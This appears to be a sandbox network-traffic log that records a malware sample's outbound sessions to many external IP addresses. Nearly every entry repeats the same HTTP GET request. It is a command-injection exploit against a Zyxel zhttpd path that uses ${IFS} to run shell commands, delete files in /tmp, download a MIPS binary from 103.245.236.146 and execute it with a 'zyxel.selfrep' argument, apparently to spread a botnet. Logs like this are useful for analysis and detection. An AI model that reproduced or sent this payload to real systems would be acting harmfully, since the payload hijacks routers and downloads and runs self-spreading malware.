                                              Jan 29, 2024 07:03:58.167547941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6407192.168.2.145167274.1.100.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167587996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6408192.168.2.1443092132.82.102.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167630911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6409192.168.2.145483676.67.207.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167659998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6410192.168.2.1450894148.52.247.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167695045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6411192.168.2.1449080203.153.27.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167714119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6412192.168.2.14531709.204.156.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167764902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6413192.168.2.1459110212.96.148.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167783022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6414192.168.2.1443052106.217.220.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167835951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6415192.168.2.144348671.146.182.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167864084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6416192.168.2.144212641.241.230.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167916059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6417192.168.2.1460494123.34.228.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167964935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6418192.168.2.1440636107.0.244.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167995930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6419192.168.2.1445468118.240.138.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168040991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6420192.168.2.1448742120.196.13.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168082952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6421192.168.2.144710673.69.110.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168113947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6422192.168.2.1436292207.239.34.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168168068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6423192.168.2.145451282.141.253.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168200970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6424192.168.2.1456176180.74.192.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168246031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6425192.168.2.1457902205.132.9.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168291092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6426192.168.2.1445182153.88.136.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168309927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6427192.168.2.143350444.87.59.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168337107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6428192.168.2.1433034176.73.167.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168380022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6429192.168.2.145927483.110.115.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168410063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6430192.168.2.143750681.22.115.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168426991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6431192.168.2.144006645.164.194.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168473959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6432192.168.2.145087093.12.73.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168524981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6433192.168.2.144215665.26.174.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168571949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6434192.168.2.145014232.217.13.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168590069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6435192.168.2.143457850.75.84.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168623924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6436192.168.2.144513072.176.164.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168634892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6437192.168.2.145744218.173.123.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168663025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6438192.168.2.1434576211.61.75.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168700933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6439192.168.2.143391863.246.74.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168746948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6440192.168.2.1438998123.44.94.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168791056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6441192.168.2.1443270137.122.121.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168829918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6442192.168.2.1441742221.95.214.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168864965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6443192.168.2.14417585.143.26.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168915033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6444192.168.2.1446878152.51.50.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168957949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6445192.168.2.1441510172.112.181.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.168993950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6446192.168.2.143301272.30.26.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169042110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6447192.168.2.1435278151.13.238.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169071913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6448192.168.2.145778224.208.232.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169105053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6449192.168.2.1448654185.14.140.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169126987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6450192.168.2.14364928.240.206.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169164896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6451192.168.2.145886875.53.66.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169197083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6452192.168.2.143958686.200.179.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169239044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6453192.168.2.1442496217.180.26.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169265985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6454192.168.2.145144887.240.81.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169295073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6455192.168.2.145849077.218.199.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169337034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6456192.168.2.1451634176.251.195.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169377089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6457192.168.2.1442516167.72.106.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169411898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6458192.168.2.1443140130.232.117.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169467926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6459192.168.2.1440904157.162.143.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169507980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6460192.168.2.1441820161.73.198.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169540882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6461192.168.2.1435456114.85.0.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169584990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6462192.168.2.14487444.116.221.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169617891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6463192.168.2.1444692154.191.55.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169672012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6464192.168.2.1434304147.165.248.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169703960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6465192.168.2.1448448197.37.102.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169724941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6466192.168.2.1455310121.12.44.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169747114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6467192.168.2.144865876.15.107.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169785023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6468192.168.2.145272241.73.196.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169843912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6469192.168.2.1442332114.81.249.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169881105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6470192.168.2.146047432.85.79.52443
                                              TimestampBytes transferredDirectionData
